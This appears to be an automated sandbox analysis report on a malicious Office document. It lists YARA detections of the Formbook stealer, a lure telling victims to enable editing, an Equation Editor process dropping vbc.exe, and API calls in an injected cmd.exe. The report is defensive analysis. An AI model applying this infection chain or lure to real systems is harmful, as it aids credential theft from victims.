Source: Yara match	File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 8

Screenshot OCR: enable Editing and Cont&t from the Yellow bar 19 above to view locked content. 20 21 22 23 24

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00250198	4_2_00250198
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00250821	4_2_00250821
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002548B8	4_2_002548B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00254AF7	4_2_00254AF7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00254B08	4_2_00254B08
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B9DA	5_2_0041B9DA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C2B0	5_2_0041C2B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C70	5_2_00408C70
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BC20	5_2_0041BC20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D87	5_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C58D	5_2_0041C58D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BE92	5_2_0041BE92
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0088E0C6	5_2_0088E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008BD005	5_2_008BD005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00893040	5_2_00893040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008A905A	5_2_008A905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0088E2E9	5_2_0088E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00931238	5_2_00931238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0088F3CF	5_2_0088F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008B63DB	5_2_008B63DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00892305	5_2_00892305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00897353	5_2_00897353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008DA37B	5_2_008DA37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008A1489	5_2_008A1489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008C5485	5_2_008C5485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008AC5F0	5_2_008AC5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0089351F	5_2_0089351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00894680	5_2_00894680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0089E6C1	5_2_0089E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00932622	5_2_00932622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091579A	5_2_0091579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0089C7BC	5_2_0089C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092F8EE	5_2_0092F8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0089C85C	5_2_0089C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008B286D	5_2_008B286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093098E	5_2_0093098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008929B2	5_2_008929B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008A69FE	5_2_008A69FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00915955	5_2_00915955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00943A83	5_2_00943A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093CBA4	5_2_0093CBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091DBDA	5_2_0091DBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0088FBD7	5_2_0088FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008B7B00	5_2_008B7B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A73B210	7_2_4A73B210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A7412D2	7_2_4A7412D2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A73E46C	7_2_4A73E46C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A7439B6	7_2_4A7439B6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02401238	7_2_02401238
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0235E2E9	7_2_0235E2E9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02362305	7_2_02362305
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023AA37B	7_2_023AA37B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02367353	7_2_02367353
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023863DB	7_2_023863DB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0235F3CF	7_2_0235F3CF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0238D005	7_2_0238D005
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0237905A	7_2_0237905A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02363040	7_2_02363040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0235E0C6	7_2_0235E0C6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02402622	7_2_02402622
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02364680	7_2_02364680
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0236E6C1	7_2_0236E6C1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0236C7BC	7_2_0236C7BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E579A	7_2_023E579A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02395485	7_2_02395485
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02371489	7_2_02371489
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0236351F	7_2_0236351F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0237C5F0	7_2_0237C5F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02413A83	7_2_02413A83
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02387B00	7_2_02387B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0235FBD7	7_2_0235FBD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0240CBA4	7_2_0240CBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023EDBDA	7_2_023EDBDA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0238286D	7_2_0238286D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0236C85C	7_2_0236C85C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023FF8EE	7_2_023FF8EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E5955	7_2_023E5955
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023629B2	7_2_023629B2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023769FE	7_2_023769FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0240098E	7_2_0240098E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0237EE4C	7_2_0237EE4C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02370F3F	7_2_02370F3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_02390D3B	7_2_02390D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0236CD5B	7_2_0236CD5B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023FFDDD	7_2_023FFDDD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0009B9DA	7_2_0009B9DA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0009C2B0	7_2_0009C2B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0009BC20	7_2_0009BC20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_00088C70	7_2_00088C70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0009C58D	7_2_0009C58D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_00082D87	7_2_00082D87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0009BE92	7_2_0009BE92
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_00082FB0	7_2_00082FB0

Source: C:\Users\Public\vbc.exe	Code function: String function: 008D3F92 appears 70 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008D373B appears 185 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008FF970 appears 71 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0088E2A8 appears 32 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0088DF5C appears 87 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0235E2A8 appears 38 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 023A373B appears 237 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 023A3F92 appears 99 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 023CF970 appears 77 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0235DF5C appears 101 times

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004185B0 NtCreateFile,	5_2_004185B0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418660 NtReadFile,	5_2_00418660
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004186E0 NtClose,	5_2_004186E0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418790 NtAllocateVirtualMemory,	5_2_00418790
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004185AA NtCreateFile,	5_2_004185AA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004186DA NtClose,	5_2_004186DA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041878A NtAllocateVirtualMemory,	5_2_0041878A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008800C4 NtCreateFile,LdrInitializeThunk,	5_2_008800C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00880048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00880048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00880078 NtResumeThread,LdrInitializeThunk,	5_2_00880078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008807AC NtCreateMutant,LdrInitializeThunk,	5_2_008807AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087F9F0 NtClose,LdrInitializeThunk,	5_2_0087F9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087F900 NtReadFile,LdrInitializeThunk,	5_2_0087F900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_0087FAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_0087FAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_0087FBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_0087FB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_0087FC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_0087FC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FD8C NtDelayExecution,LdrInitializeThunk,	5_2_0087FD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_0087FDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_0087FEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_0087FED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FFB4 NtCreateSection,LdrInitializeThunk,	5_2_0087FFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008810D0 NtOpenProcessToken,	5_2_008810D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00880060 NtQuerySection,	5_2_00880060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008801D4 NtSetValueKey,	5_2_008801D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0088010C NtOpenDirectoryObject,	5_2_0088010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00881148 NtOpenThread,	5_2_00881148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087F8CC NtWaitForSingleObject,	5_2_0087F8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00881930 NtSetContextThread,	5_2_00881930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087F938 NtWriteFile,	5_2_0087F938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FAB8 NtQueryValueKey,	5_2_0087FAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FA20 NtQueryInformationFile,	5_2_0087FA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FA50 NtEnumerateValueKey,	5_2_0087FA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FBE8 NtQueryVirtualMemory,	5_2_0087FBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FB50 NtCreateKey,	5_2_0087FB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0087FC30 NtOpenProcess,	5_2_0087FC30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A751E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	7_2_4A751E5F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A74F6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile,	7_2_4A74F6CF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A73C2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,	7_2_4A73C2A6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A7418A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	7_2_4A7418A6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A73C48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose,	7_2_4A73C48A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A73C52D NtQueryInformationToken,	7_2_4A73C52D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023500C4 NtCreateFile,LdrInitializeThunk,	7_2_023500C4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023507AC NtCreateMutant,LdrInitializeThunk,	7_2_023507AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_0234FAE8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_0234FB68
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FB50 NtCreateKey,LdrInitializeThunk,	7_2_0234FB50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234FBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_0234FBB8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_0234F900 NtReadFile,LdrInitializeThunk,	7_2_0234F900
